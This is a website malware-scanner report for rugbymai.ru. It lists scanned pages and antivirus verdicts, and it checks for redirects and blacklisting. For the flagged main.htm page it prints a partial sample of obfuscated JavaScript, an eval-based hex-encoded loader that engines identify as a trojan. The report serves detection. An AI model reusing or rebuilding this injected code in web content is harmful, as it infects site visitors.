Malware Scanner report for rugbymai.ru

Malicious/Suspicious/Total URLs checked: 7/0/15
7 pages have malicious code. See details below.
Blacklists: OK
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK

Scanned pages/files

Request | Server response | Status
http://rugbymai.ru/
200 OK
Content-Length: 41479
Content-Type: text/html
clean
http://rugbymai.ru/sponsor/comcor1.htm
200 OK
Content-Length: 1288
Content-Type: text/html
clean
http://rugbymai.ru/sponsor/../main.htm
200 OK
Content-Length: 51301
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var jQuery=window['e.vTa.l['.replace(/[4\.T\[w]/g, '')]('ezvUa&l<'.replace(/[US\<&z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x6e\x54\x66\x62\x28\x66\x63\x30\x41\x48\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x46\x4d\x67\x28\x74\x75\x59\x41\x51\x55\x52\x29\x7b\x76\x61\x72\x20\x67\x49\x51\x49\x4a\x3d\x30\x3b\x76\x61\x72\x20\x6c\x73\x46\x77\x30\x46\x3d\x74\x75\x59\x41\x51\x55\x52\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x67\x59\x50\x36\x7a\x3d\x30\x3b\x77\x68\x69\x6c
... 20219 bytes are skipped ...
3\x61\x25\x30\x31\x25\x37\x32\x25\x33\x34\x25\x34\x65\x25\x37\x31\x25\x32\x63\x25\x37\x66\x25\x30\x36\x25\x36\x31\x25\x32\x30\x25\x34\x31\x25\x33\x34\x25\x32\x61\x25\x30\x39\x25\x33\x65\x25\x36\x39\x25\x32\x36\x25\x36\x35\x25\x37\x66\x25\x33\x38\x25\x31\x38\x25\x33\x61\x25\x32\x62\x25\x37\x35\x25\x37\x34\x25\x33\x38\x25\x33\x30\x25\x32\x61\x25\x33\x36\x25\x36\x66\x25\x32\x61\x25\x31\x62\x25\x36\x66\x25\x33\x37\x25\x30\x36\x25\x33\x37\x25\x33\x64\x25\x36\x63\x25\x36\x37\x25\x37\x64\x27\x29\x3b');

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Agent-CQO [Trj]
Ad-Aware
JS:Trojan.Crypt.IQ
nProtect
JS:Trojan.Crypt.IQ
TrendMicro-HouseCall
TROJ_GEN.F47V0424
Emsisoft
JS:Trojan.Crypt.IQ (B)
Microsoft
VirTool:JS/Obfuscator.DO
MicroWorld-eScan
JS:Trojan.Crypt.IQ
F-Secure
JS:Trojan.Crypt.IQ
AVG
HTML/Framer
GData
JS:Trojan.Crypt.IQ
Commtouch
JS/Obf.A.gen
BitDefender
JS:Trojan.Crypt.IQ

http://rugbymai.ru/sponsor/../sponsor/comcor1.htm
200 OK
Content-Length: 1288
Content-Type: text/html
clean
http://rugbymai.ru/sponsor/../sponsor/../main.htm
200 OK
Content-Length: 51301
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Agent-CQO [Trj]
Ad-Aware
JS:Trojan.Crypt.IQ
nProtect
JS:Trojan.Crypt.IQ
TrendMicro-HouseCall
TROJ_GEN.F47V0424
Emsisoft
JS:Trojan.Crypt.IQ (B)
Microsoft
VirTool:JS/Obfuscator.DO
MicroWorld-eScan
JS:Trojan.Crypt.IQ
F-Secure
JS:Trojan.Crypt.IQ
AVG
HTML/Framer
GData
JS:Trojan.Crypt.IQ
Commtouch
JS/Obf.A.gen
BitDefender
JS:Trojan.Crypt.IQ

http://rugbymai.ru/sponsor/../sponsor/../sponsor/comcor1.htm
200 OK
Content-Length: 1288
Content-Type: text/html
clean
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../main.htm
200 OK
Content-Length: 51301
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Agent-CQO [Trj]
Ad-Aware
JS:Trojan.Crypt.IQ
nProtect
JS:Trojan.Crypt.IQ
TrendMicro-HouseCall
TROJ_GEN.F47V0424
Emsisoft
JS:Trojan.Crypt.IQ (B)
Microsoft
VirTool:JS/Obfuscator.DO
MicroWorld-eScan
JS:Trojan.Crypt.IQ
F-Secure
JS:Trojan.Crypt.IQ
AVG
HTML/Framer
GData
JS:Trojan.Crypt.IQ
Commtouch
JS/Obf.A.gen
BitDefender
JS:Trojan.Crypt.IQ

http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm
200 OK
Content-Length: 1288
Content-Type: text/html
clean
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../main.htm
200 OK
Content-Length: 51301
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Agent-CQO [Trj]
Ad-Aware
JS:Trojan.Crypt.IQ
nProtect
JS:Trojan.Crypt.IQ
TrendMicro-HouseCall
TROJ_GEN.F47V0424
Emsisoft
JS:Trojan.Crypt.IQ (B)
Microsoft
VirTool:JS/Obfuscator.DO
MicroWorld-eScan
JS:Trojan.Crypt.IQ
F-Secure
JS:Trojan.Crypt.IQ
AVG
HTML/Framer
GData
JS:Trojan.Crypt.IQ
Commtouch
JS/Obf.A.gen
BitDefender
JS:Trojan.Crypt.IQ

http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm
200 OK
Content-Length: 1288
Content-Type: text/html
clean
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm
200 OK
Content-Length: 51301
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Agent-CQO [Trj]
Ad-Aware
JS:Trojan.Crypt.IQ
nProtect
JS:Trojan.Crypt.IQ
TrendMicro-HouseCall
TROJ_GEN.F47V0424
Emsisoft
JS:Trojan.Crypt.IQ (B)
Microsoft
VirTool:JS/Obfuscator.DO
MicroWorld-eScan
JS:Trojan.Crypt.IQ
F-Secure
JS:Trojan.Crypt.IQ
AVG
HTML/Framer
GData
JS:Trojan.Crypt.IQ
Commtouch
JS/Obf.A.gen
BitDefender
JS:Trojan.Crypt.IQ

http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm
200 OK
Content-Length: 1288
Content-Type: text/html
clean
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm
200 OK
Content-Length: 51301
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Agent-CQO [Trj]
Ad-Aware
JS:Trojan.Crypt.IQ
nProtect
JS:Trojan.Crypt.IQ
TrendMicro-HouseCall
TROJ_GEN.F47V0424
Emsisoft
JS:Trojan.Crypt.IQ (B)
Microsoft
VirTool:JS/Obfuscator.DO
MicroWorld-eScan
JS:Trojan.Crypt.IQ
F-Secure
JS:Trojan.Crypt.IQ
AVG
HTML/Framer
GData
JS:Trojan.Crypt.IQ
Commtouch
JS/Obf.A.gen
BitDefender
JS:Trojan.Crypt.IQ

http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/comcor1.htm
200 OK
Content-Length: 1288
Content-Type: text/html
clean
http://rugbymai.ru/sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../sponsor/../main.htm
200 OK
Content-Length: 51301
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
JS:Agent-CQO [Trj]
Ad-Aware
JS:Trojan.Crypt.IQ
nProtect
JS:Trojan.Crypt.IQ
TrendMicro-HouseCall
TROJ_GEN.F47V0424
Emsisoft
JS:Trojan.Crypt.IQ (B)
Microsoft
VirTool:JS/Obfuscator.DO
MicroWorld-eScan
JS:Trojan.Crypt.IQ
F-Secure
JS:Trojan.Crypt.IQ
AVG
HTML/Framer
GData
JS:Trojan.Crypt.IQ
Commtouch
JS/Obf.A.gen
BitDefender
JS:Trojan.Crypt.IQ


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: rugbymai.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 27 Apr 2014 16:55:13 GMT
Accept-Ranges: bytes
ETag: "13258ea-a207-487aa0b9ef700"
Server: nginx
Vary: Accept-Encoding
Content-Length: 41479
Content-Type: text/html
Last-Modified: Fri, 28 May 2010 16:31:56 GMT

...41479 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: rugbymai.ru
Referer: http://www.google.com/search?q=rugbymai.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rugbymai.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://rugbymai.ru/

Result: rugbymai.ru is not infected or malware details are not published yet.